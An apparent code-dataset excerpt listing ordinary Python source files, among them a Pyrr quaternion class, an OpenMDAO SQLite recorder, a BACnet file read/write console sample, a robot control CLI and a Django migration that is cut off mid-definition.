path
stringlengths 23
146
| source_code
stringlengths 0
261k
|
|---|---|
data/adamlwgriffiths/Pyrr/pyrr/objects/quaternion.py
|
"""Represents a Quaternion rotation.
The Quaternion class provides a number of convenient functions and
conversions.
::
import numpy as np
from pyrr import Quaternion, Matrix33, Matrix44, Vector3, Vector4
q = Quaternion()
q = Quaternion.from_x_rotation(np.pi / 2.0)
q = Quaternion.from_matrix(Matrix33.identity())
q = Quaternion.from_matrix(Matrix44.identity())
q = Quaternion(Quaternion())
q = Quaternion(Matrix33.identity())
q = Quaternion(Matrix44.identity())
q1 = Quaternion.from_y_rotation(np.pi / 2.0)
q2 = Quaternion.from_x_rotation(np.pi / 2.0)
q3 = q1 * q2
m33 = q3.matrix33
m44 = q3.matrix44
q4 = Quaternion(m44)
q = Quaternion() * Matrix33.identity()
q = Quaternion() * Matrix44.identity()
v3 = Quaternion() * Vector3()
v4 = Quaternion() * Vector4()
q = Quaternion.from_x_rotation(np.pi / 2.0)
v = q * Vector3([1.,1.,1.])
original = ~q * v
assert np.allclose(original, v)
dot = Quaternion() | Quaternion.from_x_rotation(np.pi / 2.0)
"""
from __future__ import absolute_import
import numpy as np
from multipledispatch import dispatch
from .base import BaseObject, BaseQuaternion, BaseMatrix, BaseVector, NpProxy
from .. import quaternion
class Quaternion(BaseQuaternion):
    """Quaternion rotation stored as a 4-element array in (x, y, z, w) order."""

    # Module that provides the array-level quaternion operations.
    _module = quaternion
    # Backing numpy array shape.
    _shape = (4,)

    # Named component views onto the underlying array (index-backed proxies).
    x = NpProxy(0)
    y = NpProxy(1)
    z = NpProxy(2)
    w = NpProxy(3)
    xy = NpProxy([0,1])
    xyz = NpProxy([0,1,2])
    xyzw = NpProxy([0,1,2,3])
    xz = NpProxy([0,2])
    xzw = NpProxy([0,2,3])
    xyw = NpProxy([0,1,3])
    xw = NpProxy([0,3])

    @classmethod
    def from_x_rotation(cls, theta, dtype=None):
        """Creates a new Quaternion with a rotation around the X-axis.
        """
        return cls(quaternion.create_from_x_rotation(theta, dtype))

    @classmethod
    def from_y_rotation(cls, theta, dtype=None):
        """Creates a new Quaternion with a rotation around the Y-axis.
        """
        return cls(quaternion.create_from_y_rotation(theta, dtype))

    @classmethod
    def from_z_rotation(cls, theta, dtype=None):
        """Creates a new Quaternion with a rotation around the Z-axis.
        """
        return cls(quaternion.create_from_z_rotation(theta, dtype))

    @classmethod
    def from_axis_rotation(cls, axis, theta, dtype=None):
        """Creates a new Quaternion with a rotation around the specified axis.
        """
        return cls(quaternion.create_from_axis_rotation(axis, theta, dtype))

    @classmethod
    def from_matrix(cls, matrix, dtype=None):
        """Creates a Quaternion from the specified Matrix (Matrix33 or Matrix44).
        """
        return cls(quaternion.create_from_matrix(matrix, dtype))

    @classmethod
    def from_eulers(cls, eulers, dtype=None):
        """Creates a Quaternion from the specified Euler angles.
        """
        return cls(quaternion.create_from_eulers(eulers, dtype))

    @classmethod
    def from_inverse_of_eulers(cls, eulers, dtype=None):
        """Creates a Quaternion from the inverse of the specified Euler angles.
        """
        return cls(quaternion.create_from_inverse_of_eulers(eulers, dtype))

    def __new__(cls, value=None, dtype=None):
        if value is not None:
            obj = value
            if not isinstance(value, np.ndarray):
                obj = np.array(value, dtype=dtype)
            # A 3x3 / 4x4 input is treated as a rotation matrix and converted.
            if obj.shape in ((4,4,), (3,3,)) or isinstance(obj, (Matrix33, Matrix44)):
                obj = quaternion.create_from_matrix(obj, dtype=dtype)
        else:
            # No value given: build the default quaternion.  NOTE(review):
            # presumably quaternion.create() returns the identity rotation
            # (0., 0., 0., 1.) -- confirm against pyrr.quaternion.
            obj = quaternion.create(dtype=dtype)
        obj = obj.view(cls)
        return super(Quaternion, cls).__new__(cls, obj)

    # The BaseObject overloads below reject operations on unsupported object
    # types; more specific overloads further down take precedence under
    # multipledispatch.
    @dispatch(BaseObject)
    def __add__(self, other):
        self._unsupported_type('add', other)

    @dispatch(BaseObject)
    def __sub__(self, other):
        self._unsupported_type('subtract', other)

    @dispatch(BaseObject)
    def __mul__(self, other):
        self._unsupported_type('multiply', other)

    @dispatch(BaseObject)
    def __truediv__(self, other):
        self._unsupported_type('divide', other)

    @dispatch(BaseObject)
    def __div__(self, other):
        self._unsupported_type('divide', other)

    @dispatch((BaseQuaternion, np.ndarray, list))
    def __sub__(self, other):
        return Quaternion(super(Quaternion, self).__sub__(other))

    # Quaternion * Quaternion combines the rotations (see cross()).
    @dispatch((BaseQuaternion, list))
    def __mul__(self, other):
        return self.cross(other)

    # The | operator is the quaternion dot product.
    @dispatch((BaseQuaternion, list))
    def __or__(self, other):
        return self.dot(other)

    def __invert__(self):
        # ~q is the conjugate (the opposite rotation).
        return self.conjugate

    # Multiplying by a matrix converts the matrix to a Quaternion first.
    @dispatch(BaseMatrix)
    def __mul__(self, other):
        return self * Quaternion(other)

    # Multiplying by a vector applies this rotation to it; the result keeps
    # the vector's own type.
    @dispatch(BaseVector)
    def __mul__(self, other):
        return type(other)(quaternion.apply_to_vector(self, other))

    @property
    def length(self):
        """Returns the length of this Quaternion.
        """
        return quaternion.length(self)

    def normalise(self):
        """Normalises this Quaternion in-place.
        """
        self[:] = quaternion.normalise(self)

    @property
    def normalised(self):
        """Returns a normalised version of this Quaternion as a new Quaternion.
        """
        return Quaternion(quaternion.normalise(self))

    @property
    def angle(self):
        """Returns the angle around the axis of rotation of this Quaternion as a float.
        """
        return quaternion.rotation_angle(self)

    @property
    def axis(self):
        """Returns the axis of rotation of this Quaternion as a Vector3.
        """
        return Vector3(quaternion.rotation_axis(self))

    def cross(self, other):
        """Returns the cross of this Quaternion and another.
        This is the equivalent of combining Quaternion rotations (like Matrix multiplication).
        """
        return Quaternion(quaternion.cross(self, other))

    def dot(self, other):
        """Returns the dot of this Quaternion and another.
        """
        return quaternion.dot(self, other)

    @property
    def conjugate(self):
        """Returns the conjugate of this Quaternion.
        This is a Quaternion with the opposite rotation.
        """
        return Quaternion(quaternion.conjugate(self))

    @property
    def inverse(self):
        """Returns the inverse of this quaternion.
        """
        return Quaternion(quaternion.inverse(self))

    def power(self, exponent):
        """Returns a new Quaternion representing this Quaternion to the power of the exponent.
        """
        return Quaternion(quaternion.power(self, exponent))

    @property
    def negative(self):
        """Returns the negative of the Quaternion.
        """
        return Quaternion(quaternion.negate(self))

    @property
    def is_identity(self):
        """Returns True if the Quaternion has no rotation (0.,0.,0.,1.).
        """
        return quaternion.is_identity(self)

    @property
    def matrix44(self):
        """Returns a Matrix44 representation of this Quaternion.
        """
        return Matrix44.from_quaternion(self)

    @property
    def matrix33(self):
        """Returns a Matrix33 representation of this Quaternion.
        """
        return Matrix33.from_quaternion(self)
from .vector3 import Vector3
from .matrix33 import Matrix33
from .matrix44 import Matrix44
|
data/OpenMDAO/OpenMDAO/openmdao/recorders/sqlite_recorder.py
|
"""Class definition for SqliteRecorder, which provides dictionary backed by SQLite"""
from collections import OrderedDict
from sqlitedict import SqliteDict
from openmdao.recorders.base_recorder import BaseRecorder
from openmdao.util.record_util import format_iteration_coordinate
from openmdao.core.mpi_wrap import MPI
class SqliteRecorder(BaseRecorder):
    """ Recorder that saves cases in an SQLite dictionary.

    Args
    ----
    sqlite_dict_args : dict
        Dictionary of any additional arguments for the SQL db.

    Options
    -------
    options['record_metadata'] : bool(True)
        Tells recorder whether to record variable attribute metadata.
    options['record_unknowns'] : bool(True)
        Tells recorder whether to record the unknowns vector.
    options['record_params'] : bool(False)
        Tells recorder whether to record the params vector.
    options['record_resids'] : bool(False)
        Tells recorder whether to record the residuals vector.
    options['record_derivs'] : bool(True)
        Tells recorder whether to record derivatives that are requested by a `Driver`.
    options['includes'] : list of strings
        Patterns for variables to include in recording.
    options['excludes'] : list of strings
        Patterns for variables to exclude in recording (processed after includes).
    """

    def __init__(self, out, **sqlite_dict_args):
        super(SqliteRecorder, self).__init__()
        # Under MPI only rank 0 owns (opens and later closes) the sqlite
        # file; all other ranks leave self.out as None.
        if MPI and MPI.COMM_WORLD.rank > 0:
            self._open_close_sqlitedict = False
        else:
            self._open_close_sqlitedict = True

        if self._open_close_sqlitedict:
            sqlite_dict_args.setdefault('autocommit', True)
            sqlite_dict_args.setdefault('tablename', 'openmdao')
            # flag='n' always starts a fresh database file.
            self.out = SqliteDict(filename=out, flag='n', **sqlite_dict_args)
        else:
            self.out = None

    def record_metadata(self, group):
        """Stores the metadata of the given group in a sqlite file using
        the variable name for the key.

        Args
        ----
        group : `System`
            `System` containing vectors
        """
        params = group.params.iteritems()
        unknowns = group.unknowns.iteritems()
        # NOTE: residuals are intentionally not part of the recorded
        # metadata (a previously computed-but-unused resids iterator
        # was removed here as dead code).
        data = OrderedDict([('Parameters', dict(params)),
                            ('Unknowns', dict(unknowns)),
                            ])
        self.out['metadata'] = data

    def record_iteration(self, params, unknowns, resids, metadata):
        """
        Stores the provided data in the sqlite file using the iteration
        coordinate for the key.

        Args
        ----
        params : dict
            Dictionary containing parameters. (p)
        unknowns : dict
            Dictionary containing outputs and states. (u)
        resids : dict
            Dictionary containing residuals. (r)
        metadata : dict, optional
            Dictionary containing execution metadata (e.g. iteration coordinate).
        """
        data = OrderedDict()
        iteration_coordinate = metadata['coord']
        timestamp = metadata['timestamp']
        group_name = format_iteration_coordinate(iteration_coordinate)

        data['timestamp'] = timestamp
        data['success'] = metadata['success']
        data['msg'] = metadata['msg']

        # Each vector is recorded only when its option is enabled, after
        # passing through the include/exclude filters.
        if self.options['record_params']:
            data['Parameters'] = self._filter_vector(params, 'p', iteration_coordinate)
        if self.options['record_unknowns']:
            data['Unknowns'] = self._filter_vector(unknowns, 'u', iteration_coordinate)
        if self.options['record_resids']:
            data['Residuals'] = self._filter_vector(resids, 'r', iteration_coordinate)

        self.out[group_name] = data

    def record_derivatives(self, derivs, metadata):
        """Writes the derivatives that were calculated for the driver.

        Args
        ----
        derivs : dict
            Dictionary containing derivatives
        metadata : dict, optional
            Dictionary containing execution metadata (e.g. iteration coordinate).
        """
        data = OrderedDict()
        iteration_coordinate = metadata['coord']
        timestamp = metadata['timestamp']
        # Derivatives are stored under a '/derivs' sub-key of the iteration.
        group_name = format_iteration_coordinate(iteration_coordinate)
        group_name = '%s/derivs' % group_name

        data['timestamp'] = timestamp
        data['success'] = metadata['success']
        data['msg'] = metadata['msg']
        data['Derivatives'] = derivs

        self.out[group_name] = data

    def close(self):
        """Closes `out`"""
        # Only the rank that opened the file closes it; close() is
        # idempotent because self.out is reset to None.
        if self._open_close_sqlitedict:
            if self.out is not None:
                self.out.close()
                self.out = None
|
data/Parsely/streamparse/examples/redis/src/spouts.py
|
from itertools import cycle
from streamparse import Spout
class WordSpout(Spout):
    """Spout that endlessly emits words drawn from a fixed vocabulary."""

    outputs = ['word']

    def initialize(self, stormconf, context):
        # An infinite, repeating iterator over the sample words.
        self.words = cycle(['dog', 'cat', 'zebra', 'elephant'])

    def next_tuple(self):
        # Emit the next word in the rotation as a single-field tuple.
        self.emit([next(self.words)])
|
data/Netflix/brutal/brutal/core/constants.py
|
# Generic toggle states.
OFF = 0
ON = 1

# Connection lifecycle states.
DISCONNECTED = 20
CONNECTED = 30

# Default schema versions for events and actions.
DEFAULT_EVENT_VERSION = 1
DEFAULT_ACTION_VERSION = 1
|
data/ReactiveX/RxPY/rx/disposables/singleassignmentdisposable.py
|
from .booleandisposable import BooleanDisposable
class SingleAssignmentDisposable(BooleanDisposable):
    """Represents a disposable resource which only allows a single assignment
    of its underlying disposable resource. If an underlying disposable resource
    has already been set, future attempts to set the underlying disposable
    resource will throw an Error."""

    def __init__(self):
        # The True flag presumably enables the single-assignment enforcement
        # in BooleanDisposable -- verify against booleandisposable.py.
        super(SingleAssignmentDisposable, self).__init__(True)
|
data/Julian/Condent/setup.py
|
"""Packaging script for condent."""
try:
    # distutils was removed from the standard library in Python 3.12;
    # prefer setuptools when available and fall back for old interpreters.
    from setuptools import setup
except ImportError:
    from distutils.core import setup

from condent import __version__

with open("README.rst") as readme:
    long_description = readme.read()

classifiers = [
    "Development Status :: 3 - Alpha",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: MIT License",
    "Operating System :: OS Independent",
    "Programming Language :: Python",
    "Programming Language :: Python :: 2",
    "Programming Language :: Python :: 2.6",
    "Programming Language :: Python :: 2.7",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3.1",
    "Programming Language :: Python :: 3.2",
    "Programming Language :: Python :: Implementation :: CPython",
    "Programming Language :: Python :: Implementation :: PyPy",
]

setup(
    name="condent",
    version=__version__,
    py_modules=["condent"],
    scripts=["bin/condent"],
    author="Julian Berman",
    author_email="Julian@GrayVines.com",
    classifiers=classifiers,
    description="A simple reindent for containers that reindents as I like it",
    license="MIT/X",
    long_description=long_description,
    url="http://github.com/Julian/condent",
)
|
data/JoelBender/bacpypes/samples/ReadWriteFile.py
|
"""
ReadWriteFile.py
This application presents a 'console' prompt to the user asking for commands.
The 'readrecord' and 'writerecord' commands are used with record oriented files,
and the 'readstream' and 'writestream' commands are used with stream oriented
files.
"""
import sys
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run
from bacpypes.pdu import Address
from bacpypes.app import LocalDeviceObject, BIPSimpleApplication
from bacpypes.apdu import Error, AbortPDU, \
AtomicReadFileRequest, \
AtomicReadFileRequestAccessMethodChoice, \
AtomicReadFileRequestAccessMethodChoiceRecordAccess, \
AtomicReadFileRequestAccessMethodChoiceStreamAccess, \
AtomicReadFileACK, \
AtomicWriteFileRequest, \
AtomicWriteFileRequestAccessMethodChoice, \
AtomicWriteFileRequestAccessMethodChoiceRecordAccess, \
AtomicWriteFileRequestAccessMethodChoiceStreamAccess, \
AtomicWriteFileACK
from bacpypes.basetypes import ServicesSupported
_debug = 0
_log = ModuleLogger(globals())
this_application = None
@bacpypes_debugging
class TestApplication(BIPSimpleApplication):
    """BACnet application that remembers its last outgoing request and prints
    the contents of AtomicReadFile/AtomicWriteFile ACKs to stdout."""

    def request(self, apdu):
        if _debug: TestApplication._debug("request %r", apdu)
        # Remember the outgoing request so confirmation() can tell read ACKs
        # from write ACKs.
        self._request = apdu
        BIPSimpleApplication.request(self, apdu)

    def confirmation(self, apdu):
        if _debug: TestApplication._debug("confirmation %r", apdu)
        if isinstance(apdu, Error):
            sys.stdout.write("error: %s\n" % (apdu.errorCode,))
            sys.stdout.flush()
        elif isinstance(apdu, AbortPDU):
            apdu.debug_contents()
        elif (isinstance(self._request, AtomicReadFileRequest)) and (isinstance(apdu, AtomicReadFileACK)):
            # A read ACK carries either record data or stream data.
            if apdu.accessMethod.recordAccess:
                value = apdu.accessMethod.recordAccess.fileRecordData
            elif apdu.accessMethod.streamAccess:
                value = apdu.accessMethod.streamAccess.fileData
            TestApplication._debug("    - value: %r", value)
            sys.stdout.write(repr(value) + '\n')
            sys.stdout.flush()
        elif (isinstance(self._request, AtomicWriteFileRequest)) and (isinstance(apdu, AtomicWriteFileACK)):
            # A write ACK echoes the position (stream) or record (record
            # access) that was written.
            if apdu.fileStartPosition is not None:
                value = apdu.fileStartPosition
            elif apdu.fileStartRecord is not None:
                value = apdu.fileStartRecord
            TestApplication._debug("    - value: %r", value)
            sys.stdout.write(repr(value) + '\n')
            sys.stdout.flush()
@bacpypes_debugging
class TestConsoleCmd(ConsoleCmd):
    """Console commands for reading and writing BACnet file objects with
    record- and stream-oriented access.  (Python 2 syntax.)"""

    def do_readrecord(self, args):
        """readrecord <addr> <inst> <start> <count>"""
        args = args.split()
        if _debug: TestConsoleCmd._debug("do_readrecord %r", args)

        try:
            addr, obj_inst, start_record, record_count = args
            obj_type = 'file'
            obj_inst = int(obj_inst)
            start_record = int(start_record)
            record_count = int(record_count)

            # Build a record-access read request for the file object.
            request = AtomicReadFileRequest(
                fileIdentifier=(obj_type, obj_inst),
                accessMethod=AtomicReadFileRequestAccessMethodChoice(
                    recordAccess=AtomicReadFileRequestAccessMethodChoiceRecordAccess(
                        fileStartRecord=start_record,
                        requestedRecordCount=record_count,
                        ),
                    ),
                )
            request.pduDestination = Address(addr)
            if _debug: TestConsoleCmd._debug("    - request: %r", request)

            this_application.request(request)
        except Exception, e:
            TestConsoleCmd._exception("exception: %r", e)

    def do_readstream(self, args):
        """readstream <addr> <inst> <start> <count>"""
        args = args.split()
        if _debug: TestConsoleCmd._debug("do_readstream %r", args)

        try:
            addr, obj_inst, start_position, octet_count = args
            obj_type = 'file'
            obj_inst = int(obj_inst)
            start_position = int(start_position)
            octet_count = int(octet_count)

            # Build a stream-access read request for the file object.
            request = AtomicReadFileRequest(
                fileIdentifier=(obj_type, obj_inst),
                accessMethod=AtomicReadFileRequestAccessMethodChoice(
                    streamAccess=AtomicReadFileRequestAccessMethodChoiceStreamAccess(
                        fileStartPosition=start_position,
                        requestedOctetCount=octet_count,
                        ),
                    ),
                )
            request.pduDestination = Address(addr)
            if _debug: TestConsoleCmd._debug("    - request: %r", request)

            this_application.request(request)
        except Exception, e:
            TestConsoleCmd._exception("exception: %r", e)

    def do_writerecord(self, args):
        """writerecord <addr> <inst> <start> <count> [ <data> ... ]"""
        args = args.split()
        if _debug: TestConsoleCmd._debug("do_writerecord %r", args)

        try:
            addr, obj_inst, start_record, record_count = args[0:4]
            obj_type = 'file'
            obj_inst = int(obj_inst)
            start_record = int(start_record)
            record_count = int(record_count)
            # Everything after the first four arguments is record data.
            record_data = list(args[4:])

            request = AtomicWriteFileRequest(
                fileIdentifier=(obj_type, obj_inst),
                accessMethod=AtomicWriteFileRequestAccessMethodChoice(
                    recordAccess=AtomicWriteFileRequestAccessMethodChoiceRecordAccess(
                        fileStartRecord=start_record,
                        recordCount=record_count,
                        fileRecordData=record_data,
                        ),
                    ),
                )
            request.pduDestination = Address(addr)
            if _debug: TestConsoleCmd._debug("    - request: %r", request)

            this_application.request(request)
        except Exception, e:
            TestConsoleCmd._exception("exception: %r", e)

    def do_writestream(self, args):
        """writestream <addr> <inst> <start> <data>"""
        args = args.split()
        if _debug: TestConsoleCmd._debug("do_writestream %r", args)

        try:
            addr, obj_inst, start_position, data = args
            obj_type = 'file'
            obj_inst = int(obj_inst)
            start_position = int(start_position)

            request = AtomicWriteFileRequest(
                fileIdentifier=(obj_type, obj_inst),
                accessMethod=AtomicWriteFileRequestAccessMethodChoice(
                    streamAccess=AtomicWriteFileRequestAccessMethodChoiceStreamAccess(
                        fileStartPosition=start_position,
                        fileData=data,
                        ),
                    ),
                )
            request.pduDestination = Address(addr)
            if _debug: TestConsoleCmd._debug("    - request: %r", request)

            this_application.request(request)
        except Exception, e:
            TestConsoleCmd._exception("exception: %r", e)
# Script entry: parse the INI-driven configuration, build the local device
# and application objects, then enter the bacpypes run loop.
try:
    args = ConfigArgumentParser(description=__doc__).parse_args()

    if _debug: _log.debug("initialization")
    if _debug: _log.debug(" - args: %r", args)

    # Local BACnet device built from values in the INI file.
    this_device = LocalDeviceObject(
        objectName=args.ini.objectname,
        objectIdentifier=int(args.ini.objectidentifier),
        maxApduLengthAccepted=int(args.ini.maxapdulengthaccepted),
        segmentationSupported=args.ini.segmentationsupported,
        vendorIdentifier=int(args.ini.vendoridentifier),
        )

    this_application = TestApplication(this_device, args.ini.address)

    # Advertise the services this application actually supports.
    services_supported = this_application.get_services_supported()
    if _debug: _log.debug(" - services_supported: %r", services_supported)
    this_device.protocolServicesSupported = services_supported.value

    this_console = TestConsoleCmd()

    _log.debug("running")
    run()
except Exception, e:
    _log.exception("an error has occurred: %s", e)
finally:
    _log.debug("finally")
|
data/IEEERobotics/bot/bot/interface/cli.py
|
"""Send commands to the bot through a CLI interface."""
import cmd
import sys
import os
import bot.client.ctrl_client as ctrl_client_mod
import bot.client.sub_client as sub_client_mod
class CLI(cmd.Cmd):
    """CLI for interacting with the bot.
    Note that the architecture is that interfaces, like the Command
    Line *Interface*, are used by agents like humans to interact
    with the bot. For interfaces to communicate with the bot, they
    own clients (like CtrlClient and SubClient), which know how to
    speak ZMQ to the servers (like CtrlServer and PubServer) running on
    the bot. Servers own systems (like gunner and driver) and known how
    to fire commands off to those systems and/or share data about their
    state.
    """

    # Prompt shown by cmd.Cmd for every line of input.
    prompt = "bot$ "

    def __init__(self, ctrl_addr, sub_addr):
        """Build CtrlClient and SubClient, for connections to servers.
        We're not using a logger or config here to reduce dependencies.
        CtrlClient is used for sending commands to the bot. Some commands,
        like `ping`, are answered by CtrlClient directly. Others, like
        `fire`, are actually exported methods that CtrlClient exposes
        via the API. Those calls are passed to the relevant method of a
        system owned by CtrlClient.
        SubClient manages subscriptions to topics published by PubServer
        on the bot. Topics can be subscribed to via `sub_add` and removed
        via `sub_del`. To print the data being published, use `sub`.
        Only topics that are actually subscribed to by one or more clients
        will be published by PubServer, saving bot resources. Note that
        PubServer isn't spawned by default when CtrlServer is created.
        To spawn it (in its own thread), issue `ctrl spawn_pub_server`.
        :param ctrl_addr: Address of control server to connect to via ZMQ.
        :type ctrl_addr: string
        :param sub_addr: Address of PUB/SUB server to connect to via ZMQ.
        :type sub_addr: string
        """
        cmd.Cmd.__init__(self)
        # A failure to build either client is fatal: exit instead of
        # running a CLI that cannot reach the bot.
        try:
            self.ctrl_client = ctrl_client_mod.CtrlClient(ctrl_addr)
        except Exception, e:
            print "Couldn't build CtrlClient addr:{} e:{}".format(ctrl_addr, e)
            sys.exit(-1)
        try:
            self.sub_client = sub_client_mod.SubClient(sub_addr)
        except Exception, e:
            print "SubClient error sub_addr:{}, error:{}".format(sub_addr, e)
            sys.exit(-1)

    def default(self, raw_args):
        """Parses API commands (ex `ctrl echo msg:7`) into calls to CtrlServer.
        API commands are those given by the `list` command. Note that a
        heuristic is used to convert params (like "7" in the example above)
        into the types expected by the method that will be called and passed
        that param by CtrlServer. It has held up well so far.
        :param raw_args: Command from user to be parsed/passed to CtrlServer.
        :type raw_args: string
        """
        obj_name, _, rest = raw_args.partition(" ")
        if obj_name in self.ctrl_client.objects:
            method_name, _, params = rest.partition(" ")
            if method_name in self.ctrl_client.objects[obj_name]:
                try:
                    # Parse key:value pairs, coercing values in order of
                    # preference: float, int, bool, quoted string, raw string.
                    param_dict = {}
                    for param in params.split():
                        key, value = param.split(":")
                        try:
                            if "." in value:
                                value = float(value)
                            else:
                                value = int(value)
                        except ValueError:
                            if value == "True":
                                value = True
                            elif value == "False":
                                value = False
                            elif value.startswith("'") and value.endswith("'"):
                                # Strip the surrounding single quotes.
                                value = value[1:-1]
                        param_dict[key] = value
                except IndexError:
                    print "Bad parameter list"
                    return
                except ValueError:
                    print "Bad parameter value"
                    return
                result = self.ctrl_client.call(
                    obj_name, method_name, param_dict)
                print "-->", result
            else:
                print "Unknown API method:", method_name
        else:
            print "Unknown command:", obj_name

    def completenames(self, text, *ignored):
        """Handles tab-completion of object names exported by the API.
        Object names, like those returned by `list` (driver, gun...),
        aren't known to Cmd.completenames. We extend it here to deal
        with tab-completing them.
        :param text: Text the user has type so far, to be tab-completed.
        :type text: string
        :param *ignored: Not documented in Cmd.completenames. No idea.
        :type *ignored: Not documented in Cmd.completenames. Dict?
        """
        # Built-in command matches plus API object-name matches.
        cmd_match_names = cmd.Cmd.completenames(self, text, *ignored)
        obj_names = self.ctrl_client.objects.keys()
        api_match_names = [x for x in obj_names if x.startswith(text)]
        return cmd_match_names + api_match_names

    def completedefault(self, text, line, begidx, endidx):
        """Handles tab-completion of method names exported by API.
        The matching of the first term (the object name exported by the API)
        is done separately, using the results of copmletenames().
        :param text: Part of method name (second arg) typed so far by user.
        :type text: string
        :param line: Entire line typed so far by user.
        :type line: string
        :param begidx: Index into "line" where "text" begins.
        :type begidx: int
        :param endidx: Index into "line" where "text" ends.
        :type endidx: int
        :returns: List of exported API methods that match text given by user.
        """
        obj, _, rest = line.partition(" ")
        if obj in self.ctrl_client.objects:
            method, _, params = rest.strip().partition(" ")
            # Only complete while the cursor is still on the method term.
            if method == text:
                method_names = self.ctrl_client.objects[obj]
                match_names = [x for x in method_names if x.startswith(text)]
                return match_names

    def do_list(self, raw_args):
        """Provide a list of bot API objects and their methods.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print
        print "Available bot objects and methods"
        print
        for obj_name, methods in sorted(self.ctrl_client.objects.items()):
            print "{}:".format(obj_name)
            for method in methods:
                print " - {}".format(method)
        print

    def help_list(self):
        """Provide help message for list command."""
        print "list"
        print "\tList on-bot objects and methods exposed by the API."

    def do_ping(self, raw_args):
        """Ping the control server on the bot.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        reply_time = self.ctrl_client.ping()
        print "CtrlServer response time: {}ms".format(reply_time)

    def help_ping(self):
        """Provide help message for ping command."""
        print "ping"
        print "\tPing the control server on the bot."

    def do_sub_add(self, raw_args):
        """Subscribe to a published topic.
        Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
        subscribed to by any client are not published (done automatically
        at the server).
        :param raw_args: Commands string with topic name to add.
        :type raw_args: string
        """
        try:
            topic = raw_args.split()[0]
        except (ValueError, IndexError):
            print "Invalid command, see help [cmd]."
            return
        self.sub_client.add_topic(topic)

    def help_sub_add(self):
        """Provide help message for sub_add command."""
        print "sub_add <topic>"
        print "\tSubscribe to a published topic."

    def do_sub_del(self, raw_args):
        """Unsubscribe from a published topic.
        Note that with ZMQ (libzmq) versions >= 3.0, topics that are not
        subscribed to by any client are not published (done automatically
        at the server).
        :param raw_args: Commands string with topic name to unsubscribe from.
        :type raw_args: string
        """
        try:
            topic = raw_args.split()[0]
        except (ValueError, IndexError):
            print "Invalid command, see help [cmd]."
            return
        self.sub_client.del_topic(topic)

    def help_sub_del(self):
        """Provide help message for sub_del command."""
        print "sub_del <topic>"
        print "\tUnsubscribe from a published topic."

    def do_sub(self, raw_args):
        """Print topics subscribed to via SubClient.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        self.sub_client.print_msgs()

    def help_sub(self):
        """Provide help message for sub command."""
        print "sub"
        print "\tPrint messages subscribed to. Ctrl+c to exit."

    def do_stop(self, raw_args):
        """Stop all drive and gun motors, put turret in save state.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        self.ctrl_client.stop_full()

    def help_stop(self):
        """Provide help message for stop command."""
        print "stop"
        print "\tStop all drive and gun motors, put turret in safe state."

    def do_kill(self, raw_args):
        """Send message to CtrlServer, asking it to exit.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        self.ctrl_client.exit_server()

    def help_kill(self):
        """Provide help message for kill command."""
        print "kill"
        print "\tAsk the CtrlServer to exit."

    def do_die(self, raw_args):
        """Disconnect from servers and close CLI.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print "Disconnecting..."
        self.ctrl_client.clean_up()
        self.sub_client.clean_up()
        print "Bye!"
        # Returning True tells cmd.Cmd to exit the command loop.
        return True

    def help_die(self):
        """Provide help message for die command."""
        print "die"
        print "\tDisconnect from servers and close CLI."

    def do_shell(self, cmd):
        """Allows normal shell commands to be run.
        :param cmd: Everything after "shell" or "!", to be passed to shell.
        :type cmd: string
        """
        # NOTE(review): the parameter name shadows the module-level `cmd`
        # import inside this method.
        os.system(cmd)

    def help_shell(self):
        """Provide help message for shell command."""
        print "!|shell [command]"
        print "\tSend command to underlying system shell (like Bash)."

    def do_EOF(self, raw_args):
        """Cleans up when ctrl+d is used to exit client.
        :param raw_args: Mandatory param for Cmd handler, not used.
        :type raw_args: string
        """
        print "Disconnecting..."
        self.ctrl_client.clean_up()
        self.sub_client.clean_up()
        print "Bye!"
        return True

    def help_EOF(self):
        """Provide help message for EOF (ctrl+d) command."""
        print "ctrl+d"
        print "\tDisconnect from servers and close CLI with ctrl+d."

    def help_help(self):
        """Provide help message for help command."""
        print "help [command]"
        print "\tProvide help on given command. If no argument, list commands."
if __name__ == '__main__':
    # With no arguments fall back to localhost defaults; otherwise expect
    # exactly two: ctrl_addr and sub_addr.
    if len(sys.argv) == 1:
        print "No ctrl_addr or sub_addr given, using tcp://localhost:60000,1"
        CLI("tcp://localhost:60000", "tcp://localhost:60001").cmdloop()
    elif len(sys.argv) == 3:
        ctrl_addr = sys.argv[1]
        sub_addr = sys.argv[2]
        CLI(ctrl_addr, sub_addr).cmdloop()
    else:
        print "Error: Expected `./cli.py [ctrl_addr sub_addr]`"
|
data/boto/boto/tests/integration/iam/__init__.py
| |
data/ODM2/ODMToolsPython/odmtools/controller/frmAbout.py
|
__author__ = 'Stephanie'
import wx
from wx import AboutBox, AboutDialogInfo, ClientDC
from wx.lib.wordwrap import wordwrap
from odmtools.meta import data
class frmAbout(wx.Dialog):
    """Shows the application's About box, populated from odmtools.meta.data."""

    def __init__(self, parent):
        # NOTE(review): wx.Dialog.__init__ is never called; AboutBox shows
        # its own native dialog, so the Dialog base class may be unnecessary
        # -- confirm before changing.
        self.parent = parent
        info = AboutDialogInfo()
        info.Name = data.app_name
        info.Version = data.version
        info.Copyright = data.copyright
        # Wrap long text blocks to fixed pixel widths for the dialog.
        info.Description = wordwrap(data.description, 350, ClientDC(parent))
        info.WebSite = data.website
        info.Developers = data.developers
        info.License = wordwrap(data.license, 500, ClientDC(parent))
        AboutBox(info)
|
data/MarkusH/django-dynamic-forms/dynamic_forms/migrations/0004_formmodel_recipient_email.py
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the optional ``recipient_email`` field to FormModel."""

    dependencies = [
        ('dynamic_forms', '0003_auto_20140916_1433'),
    ]

    operations = [
        migrations.AddField(
            model_name='formmodel',
            name='recipient_email',
            # null=True/blank=True keep the field optional so existing rows
            # remain valid without a data migration.
